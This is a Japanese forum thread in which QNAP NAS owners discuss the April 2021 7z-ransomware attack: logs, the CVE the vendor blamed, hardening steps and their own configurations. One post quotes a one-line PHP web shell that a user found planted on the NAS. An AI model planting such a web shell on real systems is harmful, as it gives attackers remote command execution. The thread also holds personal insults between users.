【静音・高機能NAS】QNAP part56【自宅サーバ】

■ このスレッドは過去ログ倉庫に格納されています
2021/04/22(木) 15:58:45.35ID:gJ+wWukAr
※次スレは>>970踏んだ方が立てて下さい。立てる時は1行目に !extend:checked:vvvvv:1000:512 をお忘れなく。

静音・高速・高性能なNASサーバ、QNAPのアプライアンス製品のスレ
NASを使う際に気になる点、速度・機能・静音などを高いレベルで満たす数少ない製品です
NASは初めての方から、標準搭載の各種機能が目的の方、データ保全とセキュリティが重要な業務用途、
Linuxベースの自宅サーバが欲しい方まで、幅広いユーザに最適です
QNAPは台湾のメーカーですが、マニュアルからユーティリティまで完全日本語対応です

・オフィシャルサイト: https://www.qnap.com/ja-jp/
QNAP NAS Community Forum https://forum.qnap.com/
保証情報 https://www.qnap.com/ja-jp/service_ask/
販売/流通ルートは(海外通販や並行輸入品なども含めて)幾つもあります
正規代理店も複数あるので、故障時の手間や保証サポートのことも考えて、好きな流通経路のものを

関連サイト
・QNAP Club Japan https://www.qnapclub.jp/

関連スレ
NAS総合スレPart31 (LAN接続HDD)
https://mevius.5ch.net/test/read.cgi/hard/1566794151/

前スレ・過去スレ:【静音・高機能NAS】
part49 https://mevius.5ch.net/test/read.cgi/hard/1569008532/
part50 https://mevius.5ch.net/test/read.cgi/hard/1577438170/
part51
https://mevius.5ch.net/test/read.cgi/hard/1583806285/
part52
https://mevius.5ch.net/test/read.cgi/hard/1591197765/
part53
https://mevius.5ch.net/test/read.cgi/hard/1597666162/
【静音・高機能NAS】QNAP part54【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1607608227/
【静音・高機能NAS】QNAP part55【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1615087933/
VIPQ2_EXTDAT: checked:vvvvv:1000:512:: EXT was configured
2021/04/23(金) 12:27:07.46ID:iCRSyXOg0
>>96
95を見て「それは>>16をやったからでは?」と思ったら16さんだった件

最新のMalware Removerを走らせたらそうなった、とかでもないのかな
7zが書き換えられてログ取るようにされた!QNAPに!的な
2021/04/23(金) 12:48:42.09ID:Gx4/OGZO0
>>99
/usr/local/sbin/7zの更新日付がMalware Removerが動いた時間なので多分そうではないかと
2021/04/23(金) 13:04:22.83ID:q94oGlmY0
>>89
upnpはどうなんだろう?本質的にはHBS3に入ってた認証情報が使われた可能性が結構あるというところまでな気がする。
いや疑わしきは罰すの精神でupnp無効はアリと思うけど。

>>92
Malware Remover入れて回したら、「見つかって除去したわ。再起動して」って出るけど、公式は再起動するなと言ってる罠
https://www.qnap.com/ja-jp/news/2021

>>94
今回の件とは別件だけど、adminに対して1日で1000件以上(途中から数えるのを止めた)のブルートフォース攻撃が起こったりしてるから、可能性は低いにしても外向きに構えるならadminは無効にしないと。

>>97
/mnt/ext/opt/apps/backup.phpだけあって、中身は「<?php eval($_POST["cmd"]);?>」のみだったけど、何かあるの?

>>98
スナップショットが消されてこの世の絶望を味わったけど、皮肉にもHBS3のおかげで外付けディスクにバックアップが取れてて地獄と天国を見て、
多重バックアップは必須というのを思い知ったわ。
2021/04/23(金) 13:09:45.78ID:bD92dHctM
帰ったら俺もNAS確認しよ、月曜日にはHBS3がUSBHDDを上書きしちゃう!
2021/04/23(金) 13:17:18.52ID:iCRSyXOg0
>>100
「海外フォーラムチェックしながら心配してくれてる人が、やられた?」と
動揺して勝手に16さんだと決め付けてごめんなさい

QNAPの仕業っぽかったら問題なしですね。ログの置き場も置き場だし
2021/04/23(金) 13:56:37.50ID:/H/TJXmxM
>>79
>>64のファイルがスナップショット無効化とphpのエクスプロイトらしい
2021/04/23(金) 13:57:47.85ID:Fypb96zdM
>>101
ありがとう。
念のため片方はadmin外してgoogle認証アプリの2要素までセットしたわ。
2021/04/23(金) 13:58:07.13ID:jEDYAQ4DM
ポート開放、adminの無効化、2要素認証、ポート変更は関係なく、myQNAPcloud経由でアクセスを許可してる人が侵入されるのかな?
myQNAPcloudは繋ぎ方が複数あって、UPnPとnasからqnapに繋ぎに行くcloudlinkとがある。
2021/04/23(金) 14:08:16.64ID:gJPKi2eM0
これQNAPどう落とし前つけるの?
修正バージョン配ってロックかかった人は残念だったねで終わり?
2021/04/23(金) 14:26:39.45ID:jUDl+BTHD
>>107
ゼロデイだろうからそうじゃないの?
109不明なデバイスさん (ワッチョイ fb6e-BqgI)
垢版 |
2021/04/23(金) 14:39:50.64ID:QTm3pHRK0
使用条件に入ってるだろ
いかなる理由があってもデータの損失に責任を負わないって
これに同意しなければそもそも使えない
どんなソフトでもハードでも同じ

ゼロデイだろうがそうでなかろうが関係ない
バックアップ取るのはユーザーの責任
ガタガタ騒ぐな
2021/04/23(金) 14:57:39.07ID:DPWaRh3C0
windows狙い撃ちのウイルスに感染したってMSがなんか保証するわけじゃないしな
2021/04/23(金) 15:05:38.37ID:w0popk/h0
使用条件にはQNAPを崇め奉らなければQNAPは使えないとは書かれていない

ならばガタガタ騒ぐも開発の無能さを嘆くも ユーザーの勝手 というわけだから
俺は騒ぐ分には大いに騒いでいいと思うぜ
特にこの件はな
2021/04/23(金) 15:11:13.41ID:g+UCuPFwM
大切なデータは正副予備の3段構えにしとけと


俺は言ってなかったわ(´・ω・`)
2021/04/23(金) 15:11:36.75ID:uXnE/iYQ0
結局のところ、クラウド経由のリモートアクセスみたいな飛び道具は危険って結論だよね。
「絶対」はないから、QNAPに限らず、どんな製品でも言えること。
2021/04/23(金) 15:13:19.76ID:jSMIxWxwM
>>80
raid再構築中?
2021/04/23(金) 15:17:16.76ID:bICER9Vj0
家の玄関を見せれば泥棒は何とかして忍び込もうとするものだ
2021/04/23(金) 15:20:28.74ID:Gx4/OGZO0
取り合えずやることはこれくらかな

1.Malware Removerを最新にしてスキャン
 マルウェア実行中であればパスワードが保存できる
 /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log
2.すべてのアプリを最新版に更新
3.ルーターのUPnP機能停止
2021/04/23(金) 15:22:42.10ID:gJPKi2eM0
いっそのこともう一回マルウェア実行してくれ…
2021/04/23(金) 15:38:43.01ID:jUDl+BTHD
>>109
それもそうね。

>>117
別のパスワードで二重に圧縮かけられるだけなんじゃ…
119不明なデバイスさん (ワッチョイ fb6e-BqgI)
垢版 |
2021/04/23(金) 15:50:11.63ID:QTm3pHRK0
某巨大ストレージベンダーが脆弱性突かれたとかでなく自分のトコのファームウェアのせいで世界中で企業のデータ完全に吹っ飛ばしたときでさえ使用許諾条件盾に一切保証なし。

しかも同じストレージ使ってバックアップ取ってたトコはバックアップまで全部飛んだというオマケ付き

ハードソフトはそういう世界
見限ってベンダー変えるのも自由
2021/04/23(金) 16:02:00.24ID:Gx4/OGZO0
>>101
/mnt/ext/opt/apps/backup.php が外部からHTTPで
NAS上の任意のコマンドを実行するためのコマンドのようだね

ということは/root/re.shがスナップショットを無効化するためのコマンドかな

/root/r.py も今回の攻撃に関係しているみたい
2021/04/23(金) 16:02:58.24ID:nZ8tC4jrd
この件で対策強化されて安全になるやろ
2021/04/23(金) 16:11:22.76ID:8F3ONT/w0
QSnatchで安全になったもんな(棒
2021/04/23(金) 16:54:15.76ID:q94oGlmY0
>>120
re.shもr.pyも無かったわ・・・。
2021/04/23(金) 17:04:41.80ID:y79dWhdv0
なんかスレが進んでいたので見たらゼロデイ攻撃があったのか。
IPoE(MAP-E)+Firewall+NASのIPv6無効+myQNAPCloud未登録なので
影響はないと思うけど、アップデートしておこう。
何やっているか分からないモノを外部に晒すのはちょっと怖いのでNASだけ
IPv6アドレス付与切っておいたけど、今回は正解だったか。

外付けディスクにバックアップしてる人に聞きたいのだけど、
バックアップスケジュールってどうしてる? 手動?
自動スケジュールで外付けディスク繋ぎっぱなしだとランサムウェアの
被害に遭いそうだけど、毎回手動でUSBケーブルを抜き差しするのも面倒そう…
2021/04/23(金) 17:21:08.69ID:uXnE/iYQ0
ランサムウェアにやられた後のをバックアップしたら意味がないし、複数世代のバックアップをリモートサイトに取っておくのが一番だよね。

うちは毎日同期しちゃってるからデータ改変には効果がないけど、外付けディスクと実家のNASにコピーしてる。
2021/04/23(金) 18:00:17.02ID:g+UCuPFwM
取引先から被害報告なくてちょっとガッカリ(´・ω・`)
2021/04/23(金) 18:24:44.35ID:slUpuUDqM
うちは全然被害に遭ってないっぽい
qnapcloud使っててもセーフなケースあり?
2021/04/23(金) 18:30:00.88ID:b8YttEKBM
>>127
NATとかの正確な構成を教えてほしい
2021/04/23(金) 19:28:09.10ID:TvZqdhvH0
全くわからん!

[/share/CACHEDEV1_DATA/.qpkg/MalwareRemover] # cat 7z.log
/usr/local/sbin/7z.orig
/proc/21060:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0
/usr/local/sbin/7z.orig
/proc/28651:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0
2021/04/23(金) 19:43:15.07ID:NfMEXmqj0
https://www.cybersecurity-help.cz/blog/2064.html

QNAPは、攻撃者がCVE-2020-36195(※)の脆弱性を悪用してデバイス上でランサムウェアを実行していると考えていると述べた。

※SQL injection in QNAP Multimedia Console and Media Streaming Add-On

myqnapcloudがあってもセーフなのはマルチメディア系アプリが入ってないという可能性もあるかな
2021/04/23(金) 19:45:09.67ID:vmZ8/Qfr0
うちも被害ないっぽい
マルチメディア系は切ってる
2021/04/23(金) 19:47:24.45ID:Gx4/OGZO0
>>129
暗号化のオプションを指定した場合は /usr/local/sbin/7z.orig の後にパスワードが表示される
> /usr/local/sbin/7z.orig "-p" "password"
2021/04/23(金) 19:58:33.16ID:slUpuUDqM
>>128
ぶっちゃけあんまり手の込んだ設定はしてないと思う
マルチメディア系も結構使っててQVideoやら大概のやつは入ってる
adminもそのまま、一応長いパスワードではあるけど関係無いんだよね?

ただ、イントラ内だとhttp://nas名ではアクセス不可
nas内にwindowsserver入れてiisとapache同居環境とか
変な事やってる余波で別のipじゃないと管理画面に行かない
lanは5本生えてて全部接続してる
2021/04/23(金) 20:00:38.82ID:TvZqdhvH0
>>132
今日初めてLinuxコマンドなんて打ったもんだから、こんな感じで良いんか分からんす...
Unsupported commandって言われてるから、多分やり方が違うんだろうな

[/usr] # /usr/local/sbin/7z.orig "-p" "password"

7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)



Command Line Error:
Unsupported command:
password
2021/04/23(金) 20:05:09.12ID:By7MvMqJ0
今帰って確認したけど、大丈夫ぽいかな?
マルチメディア系入ってるし、myQnapcloudも動いてる状態。
2021/04/23(金) 20:07:48.87ID:BYQMiACs0
QTSやMalware Removerを最新に更新していたら影響は無かったのでしょうか?
2021/04/23(金) 20:10:56.49ID:Gx4/OGZO0
/usr/local/sbin/7z が元のバイナリに戻っている…
2021/04/23(金) 20:15:49.46ID:Gx4/OGZO0
HBS 3 Hybrid Backup Sync と Malware Remover の更新が来ている
HBS 3 Hybrid Backup Syncの修正内容がかなりヤバそう…
2021/04/23(金) 20:37:53.30ID:NfMEXmqj0
修正も手探りなのかね。この感じだと特に必須でないなら、マルチメディア系、HBS3 backup syncは一旦停止させ、バックアップの外付けhddは外しておいた方が安全なのかもね。大丈夫な人もこれから攻撃来るかもしれないわけだし。
2021/04/23(金) 20:39:23.48ID:v4+aZER6M
バックアップなんてローカルでスケジュールでやりたい
だけなんだけどな… このアプリ重厚過ぎ
2021/04/23(金) 20:47:08.10ID:u1LkmtzBM
バックアップは簡素で軽いのがいいという人は
rsync を叩くシェルスクリプトを用意して cron で起こすとか
2021/04/23(金) 20:49:18.69ID:iHrZYhIX0
大丈夫そうで電源切った
外からのアクセスはしてなくてmyqnapcloudも使ってない
取り敢えずルーターのupnp切って外付けHDD外した、次はOSとHBS3とMalR.のバージョンアップしたら大丈夫なんだろうか
2021/04/23(金) 20:50:07.20ID:gJPKi2eM0
・シャットダウンした
・ファームとMalware Removerを更新した
・その後7zの暗号が取得できなかった
人に聞きたいんだけど、その後起動したときにHDDの動作音聞こえる?
自分のQNAPがその状況なんだけど起動したときにずっとHDDの動作音してて
何かよからぬものが動いてるはずなんだけど圧縮が進んでるようには見えなくて気味が悪いんだよね
2021/04/23(金) 20:55:04.14ID:YJ2zlXCz0
>>127
それはあると思うよ。攻撃者も一意の攻撃先に攻撃してる訳じゃないだろし、処理にも時間がかかるからタイムラグがあって当然だし。
攻撃されない(攻撃対象にならない、なれない)ことだってあると思う。
2021/04/23(金) 21:03:03.03ID:fBx4bygzM
7zやられたー・・・
でも、.Qsyncは無傷だった。
隠しフォルダには手を着けないのかしら。
2021/04/23(金) 21:05:39.99ID:Gx4/OGZO0
とりあえず最低限読んでおいた方がいいもの(すべて正しいとは限らないけど)
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z-read-metxt/page-32#entry5171881
2021/04/23(金) 21:14:57.83ID:Q20yzlwLr
外からアクセスして確認→無事。
導入時にセキュリティガチガチにしてたのが功を奏したのかな
2021/04/23(金) 21:19:05.84ID:LfmthOV3a
myqnapcloudからアクセスして確認したら
手持ち3台とも無事だったみたい
149不明なデバイスさん (ワッチョイ 3f2d-H1Bl)
垢版 |
2021/04/23(金) 21:25:19.36ID:SIjBCSGD0
この時期に論理障害が起きてシャットダウンさせたのは、不幸中の幸いだったのかもしれない。
2021/04/23(金) 21:36:38.52ID:WCUbj3Ny0
ウチも平気だった。
クラウド系停止して最新Verに全更新完了。ついでに2段階認証も付けた。
IPoE(DS-Lite)+NASのIPv6無効+myQNAPCloud 利用していた。
Admin生きていたけど、前回大騒ぎになっていた1月時点で当時の最新Verに更新していた。
2021/04/23(金) 21:37:44.14ID:cn5dDDmeM
パスワード15文字以上あるからadmin使ってても大丈夫だよね?
2021/04/23(金) 21:47:42.19ID:fBx4bygzM
頑張っていたこと
admin無効
パスワード13文字(数字、記号込み)
2段階認証使用

反省点
myqnapcloud使っていた
ルータが10年前のNTTのONU
hybrid backup sync 3でクラウドドライブと連携していた
1ヶ月くらいアップデートサボってた。


.Qsyncが無事だったのは不幸中の幸い。そして暗号化されたデータも最近バックアップ取っていたから、被害は少なくて済んだ。
これって、データを詐取されてダークウェブで公開されたりとかしないよね?
2021/04/23(金) 21:49:37.74ID:VlQchhCrM
>>152
反省するような点では無い気が・・・
2021/04/23(金) 21:56:01.69ID:cn5dDDmeM
myqnapcloudのサーバ側が乗っ取られたわけでもなさそうなのになんでそこが侵入経路になったんだろうか。
2021/04/23(金) 21:59:01.20ID:fBx4bygzM
>>153
ありがと

>>154
攻撃対象を効率的に探す手掛かりにしたんじゃないかなあ
2021/04/23(金) 22:02:19.48ID:Gx4/OGZO0
myQNAPcloudはデフォルトではインターネット公開されて
myQNAPcloudユーザであればだれでも検索できるらしいから
2021/04/23(金) 22:10:12.25ID:iCRSyXOg0
myqnapcloudのサイトで検索できるしくみもあるんだけど
文字列生成して 53/udp というのが
2021/04/23(金) 22:12:14.06ID:4bxuXQsT0
>>155
俺はHDDトラブルでQnapを3週間ほど止めていたから助かったけど>>152とほぼ同じ状況だった
正式に原因が分からないと再稼働できないよ
2021/04/23(金) 22:26:20.22ID:f9jkfur/0
>>152のテンプレ少し改良してみた
■被害=無し

※認証関係
admin 有効
パスワード 15文字(数字、記号込み)
2段階認証 使ってない

※NW関係
myqnapcloud 未登録&未稼働
VPN利用 L2TP
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他 NAT通過はVPNのみ

※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ 有効
ssh 有効
OS 4.3.3 build 20180504
2021/04/23(金) 22:47:35.37ID:fBx4bygzM
>>159
乗っかってみる

■被害=蟻

※認証関係
admin 無効
パスワード 13文字(数字、記号込み)
2段階認証 使っている

※NW関係
myqnapcloud 稼働中
VPN利用 L2TP
ルータ 10年前のNTTのONU
その他 NAT通過はVPNのみ

※サービス関係
hybrid backup sync クラウドドライブと同期
media streaming addon 無効
webサーバ 無効
ssh 無効
OS build 電源切っちゃったし、再投入もしたくないので不明

>>159との違いで怪しいのはmyqnapcloudとhybrid backup syncってことなのかなあ。正直、初めはなぜ侵入されたのか理解できなくて心底恐怖だった。手持ちのPCやスマートフォンが全て侵入経路に見えて、全部電源切って触れなかったもん。今になってみると、やはりQNAP NAS(とそのソフトウェア)そのものの脆弱性に漬け込んだ攻撃だったんだろうなと、信じつつある。
161不明なデバイスさん (ワッチョイ d48e-iMGS)
垢版 |
2021/04/23(金) 22:57:12.81ID:Xl8Cu7Hr0
>>152
ルータが10年前のNTTのONU

って何?わからんではないけど。
この程度の知識レベルの人が公開してはいけない時代。
2021/04/23(金) 23:00:23.07ID:rVzphf4Q0
>>161
は?
免許制とか許可制にするのかよw
2021/04/23(金) 23:02:37.80ID:fBx4bygzM
>>161
返す言葉もないけど、ONUなんてそう気軽に交換できるものでも無いわけですよ
2021/04/23(金) 23:06:10.52ID:U2N+YGbU0
まぁホームゲートウェイのことだとは思う
165不明なデバイスさん (ワッチョイ 2e22-1bRV)
垢版 |
2021/04/23(金) 23:10:03.42ID:w5QCkDxM0
んじゃ自分もとりあえず報告しとく。
■被害=無し

※認証関係
admin 無効
HTTPSのみ有効
P/W それなりに複雑
2段階認証 有効
OpenSSL+証明書インストール済み

※NW関係
NASサービス 公開なし
システムポート 変更済み
ネットワークアクセス保護 「1分間」「5回」「期限なし」
myQNAPcloud 登録済み(アクセス制御は「カスタマイズ済み」だが未稼働。
myQNAPcloud Link 未インストール
VPN利用 OpenVPN
ルータ HG8045Q(NURO)、UPnPは無効
MyDDNS 有効
その他 NAT通過はVPN、P2P等

※サービス関係
QuFirewall(設定厳しめ)+Malware Remover 稼働中
HBS 3 ローカル&クラウドバックアップで利用
media streaming addon 有効
マルチメディアサービス 有効
ssh 無効
OS 4.5.2.1630 build 20210406(5日ほど前にアップデートした)

大体こんなとこ。
166不明なデバイスさん (ワッチョイ d48e-iMGS)
垢版 |
2021/04/23(金) 23:12:37.93ID:Xl8Cu7Hr0
言い方は悪いが、今回のことは紛争地帯にノコノコ出掛けていって誘拐されて助けを求めるのと変わらない。
>>162みたいな論点すり替えの頭の悪いやつが出てくるのも同じ構図。
ここ数年で攻撃する方の手口も複雑になった。
そんなこともわからず、そもそもONUとルーターの違いすらわからんようでは話しにならない。
感染させられたことには同情するけど、危険性を理解した上で使えってこと。
2021/04/23(金) 23:12:43.99ID:U2N+YGbU0
■被害=無し

※認証関係
admin 有効
パスワード 40桁程度文字(英数字、記号)
2段階認証 なし

※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス なし
アクセスコントロール プライベート
VPN
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他 NAT通過はVPNのみ

※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ 有効
ssh 有効
OS 4.3.3 build 20180504
168不明なデバイスさん (ワッチョイ d48e-iMGS)
垢版 |
2021/04/23(金) 23:13:48.24ID:Xl8Cu7Hr0
>>163
まだわからんのか
頭悪過ぎと思う
2021/04/23(金) 23:16:51.95ID:fBx4bygzM
>>166
>ONUとルーターの違いすらわからんようでは話しにならない。

言葉足らずだったけど、ルーター機能が内蔵されたONUって結構一般的だよ。
2021/04/23(金) 23:18:16.99ID:tjfXkeLE0
とりあえず被害なかった
本体とアプリ更新してadmin無効確認、myqnapcloudをプライベートにしてログインに二段階認証入れた
これでとりあえずかな
2021/04/23(金) 23:19:59.86ID:U2N+YGbU0
■被害=無し

※認証関係
admin 有効
パスワード 40桁程度文字(英数字、記号)
2段階認証 なし

※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス なし
アクセスコントロール プライベート
VPN OpenVPN
DDNS myqnapcloud
NAT https, OpenVPN
ルータ/UPnP 有効
NAS/UpnP 有効ただし登録サービスなし

※サービス関係
HBS 3 利用
media streaming addon 無効
QuFirewall 利用
webサーバ 有効
ssh 無効
OS 4.5.2.1630


2か所でNASを設置しているけどUPnPの有効無効以外は同じ。どちらも被害なし。
てっきりoffだと思っていたけど今回の騒ぎで慌てて確認して切った。
おそらくmyQNAPcloudの設定とHBS3の合わせ技でやられたんだろうな
2021/04/23(金) 23:21:34.52ID:cuiWrKY6M
HGWと呼ばれるブツのことなのはたぶんみんなわかってる
173不明なデバイスさん (ワッチョイ d48e-iMGS)
垢版 |
2021/04/23(金) 23:22:13.27ID:Xl8Cu7Hr0
>>169
後付けの言い訳やめろよ
ONUはONU。ルーターはルーター。
NTTには単体のONUとか単体のルーターがないとでもいうのか?
書くならONU内蔵のルーター、型番○○だ。
だから頭が悪いと指摘している。
2021/04/23(金) 23:22:27.55ID:V3nnq0VN0
>>169
機器形態としてはその通りだけど、機能を意識すれば自然と論理構成で表現するはず。
ゆえに意味が分かっていればF/Wやルーターと言うし、理解していなければそれ以外。
2021/04/23(金) 23:24:03.53ID:TvZqdhvH0
もう諦めて凄腕ハッカーが攻撃して暗号キーを公開してくれるの待つことにする
2021/04/23(金) 23:25:01.67ID:R6Ruho+20
一昨日NASがハード的に死んだんで
新しいのを買おうと最新情報仕入れに来たら
えらいことになってんのね

まさか俺のもやられてるのかしら…
2021/04/23(金) 23:33:01.96ID:9k/aHJIK0
>>173
自分が知らない事指摘されて顔真っ赤じゃん
2021/04/23(金) 23:34:21.16ID:PngjUEy80
参考にならんかもだけど

共通
admin無効、管理者20桁パスワード、2段階認証有効
ポート・NAT openVPNの1ポートのみ

3月末 malware発見
機種 TS-220
QTS 4.3.x
HBS(旧版?)
myQnapCloud 利用、公開
uPnP on
QuFirewall なし

現在 被害なし
機種 TS-253D
QTS 4.5.2
HBS 3
myQnapCloud off、非公開
uPnP off
QuFirewall 最高設定
2021/04/23(金) 23:35:50.19ID:gJPKi2eM0
>>175
俺もホワイトハッカーが暗号鍵生成方法を公開してくれるのを待つ
それまで真面目に家内NWのセキュリティ勉強するわ
お金もちゃんと出す
2021/04/23(金) 23:40:06.77ID:fBx4bygzM
>>174
仰るとおり。HGWと呼ばれるブツのことだとみんなが理解してくれるものと、甘えていたよ。

>>169
ごめんね、ごめんね。
181不明なデバイスさん (ワッチョイ d48e-iMGS)
垢版 |
2021/04/23(金) 23:59:31.84ID:Xl8Cu7Hr0
>>177
最初の書き込みで「わからんではないけど」と書いてあるだろうが。
お前も頭の悪いやつだな。
2021/04/24(土) 00:01:15.15ID:mYAQySOO0
どうでもいいことにこだわってスレを荒らすなよアスペかよ
2021/04/24(土) 00:04:56.38ID:4uFl3/ie0
余ってるqnapを再構築してノーガード公開したら楽しそうだけどHBSは最新版になっちゃうか
184不明なデバイスさん (ワッチョイ 245f-jaYo)
垢版 |
2021/04/24(土) 00:06:56.88ID:BZr/HOSu0
>>175
わかった。ちょっと待ってろ。
2021/04/24(土) 00:09:20.95ID:T8vFlTn90
14へ行け カラ上げ小僧
2021/04/24(土) 00:14:25.09ID:haC/N4eMM
ここまで読んだ限り侵入されたのは馬鹿ばっか
これでOK?
2021/04/24(土) 00:14:41.67ID:hWZUKHrd0
はい
2021/04/24(土) 00:32:38.28ID:qwe4jpGu0
>>186
違いますね
2021/04/24(土) 00:53:24.63ID:nUPLoS7i0
1時間くらいmyqnapcloudでパブリックにして放置してみたけど特にアタックなかったな。
ちなみにomankoっていうidは空いてたぞ。
ただし人柱にしたポンコツQTSは4.2.6だったからHBS3は載ってない。
2021/04/24(土) 01:06:40.95ID:IftYqCur0
431Kでポートトランキングを設定して、スマホからは繋がるのにPCからは繋がらないんだけど、何かPCで設定いる?
ルータはNETGEARのRAX80で、ルータの設定画面上ではリンクアグリゲーションとして認識してる
Windows10の資格情報は書き換えた
2021/04/24(土) 01:09:28.62ID:IftYqCur0
ちなみにNASの再起動後一瞬だけ接続できる
2021/04/24(土) 01:39:47.01ID:C6zw1deW0
NASに被害受けてなくても頭に致命的なダメージ負ってる奴がいてワロタ

アスペでも生きていけるから頑張れ(´・ω・`)
193不明なデバイスさん (ワッチョイ 4652-zvOL)
垢版 |
2021/04/24(土) 01:47:16.76ID:Ev7PpdJu0
>>190
繋がるというかネットワークとして疎通できるか、ARPテーブルとかも確認してみるとか。
2021/04/24(土) 01:57:32.35ID:wewlGYRe0
iPhoneからopenvpnがどうしてもつながらない。
妙なこだわりはないからこれやれば鉄板っていう設定を教えて欲しい。
2021/04/24(土) 02:06:50.75ID:YaHK2aCH0
今回の攻撃で暗号化されるのはどの範囲までなんだろう?
自分で作成した共有フォルダ下や外付けドライブまで暗号化されるんだろうか。
2021/04/24(土) 02:16:47.86ID:DEubrLMaa
よくわからんが被害は受けてないな

adminユーザは無効にしてるがそれ以外はデフォルトでセキュリティは高くないはず。
myqnap登録ありで公開サービスもある。
数週間前のadminアタックも受けてた。
ただ日本時間23時から9時までは電源落としてる
197不明なデバイスさん (ワッチョイ 2e32-zdG1)
垢版 |
2021/04/24(土) 06:18:01.59ID:oDEb9on50
>>194
ユーザにopenvpn許可してる?
198不明なデバイスさん (ワッチョイ 2e32-zdG1)
垢版 |
2021/04/24(土) 06:18:55.62ID:oDEb9on50
>>195
外付けのhddには被害なしだった
■ このスレッドは過去ログ倉庫に格納されています
5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。

ニューススポーツなんでも実況